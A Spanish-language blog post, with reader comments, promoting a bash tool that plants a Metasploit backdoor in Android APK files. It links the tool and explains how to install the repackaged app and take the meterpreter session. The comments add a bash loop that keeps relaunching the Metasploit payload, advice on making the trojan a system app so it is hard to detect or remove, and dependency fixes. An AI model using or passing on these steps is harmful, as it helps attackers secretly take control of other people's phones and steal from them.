backdoor-apk, un script en bash para añadir un backdoor en un apk fácilmente

Backdoor-apk es un script en bash de Dana James que simplifica el proceso de agregar un backdoor a cualquier archivo APK de Android. Si tienes algunos conocimientos prácticos de Linux, bash, Metasploit, Apktool, el SDK de Android, smali, etc. te recomendamos echar un vistazo al código y descubrirás lo sencillo pero práctico que es:

https://github.com/dana-at-cp/backdoor-apk/blob/master/backdoor-apk/backdoor-apk.sh

Por supuesto, este script se proporciona tal cual, sin garantía de ningún tipo y está destinado únicamente a fines educativos.

Uso:


Encontrarás el APK recompilado en el directorio 'original/dist'. Instala luego el APK en un dispositivo Android compatible, ejecútalo y maneja la conexión meterpreter a través del script de recursos generado: msfconsole -r backdoor-apk.rc

Proyecto: https://github.com/dana-at-cp/backdoor-apk

5 comentarios :

  1. unfortunately the app has stopped. Alguna solución? Demasiado facil para ser cierto.

    ResponderEliminar
    Respuestas
    1. puedes especificar un poco más el detalle del error, entorno, etc.?

      Eliminar
  2. I9300 CM 13.0 Android 6.0, Tablet Orinoquia Android 4.4.2, Note4 Android 5.0.1. En todos los dispositivos se detiene la ejecucion de la apk justo despues de ser instalada.

    ResponderEliminar
  3. https://i.stack.imgur.com/wSKz6.png Exactamente esto mismo pero con cualquier apk que use hasta con la original que usan en ese ejemplo mayormente el ccleaner. También sucede así con TheFatRAT, apk_binder_script, apk-embed-payload, the-backdoor-factory todas en github; y meterpreter solo es el único que saca la cara pero esta demasiado evidente el MainActivity, la conexión se cierra tras pocos segundos Reason: Die. Con este script se mejora la situación un poco
    --------------------------------------------------------------------
    #!/bin/bash
    while :
    do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
    sleep 20
    done
    ----------------------------------------------------------------------
    Pero se debe seguir perfeccionando la práctica, por último lograr a convertir una apk en apk del sistema o system con link2sd ayuda full a hacer mas difícil la detección por un novato o la elimnacion del backdoor o troyano. Increíblemente sigo obteniendo mejores resultados de pruebas controladas y autorizadas con AndroRAT siendo pionero en este tema. Desconozco si google ha parcheado este tema de los binder o emdeb apk :(. Gracias por la ayuda excelente artículo pero me temo que estamos en enfrentando otros niveles de seguridad.

    ResponderEliminar
  4. Hola, el script funciona perfectamente.
    Si estás usando Kali Linux. Deberías asegurarte que tienes las dependencias instaladas.

    apt-get update
    apt-get install lib32zl lib32ncurses5

    Un saludo.

    ResponderEliminar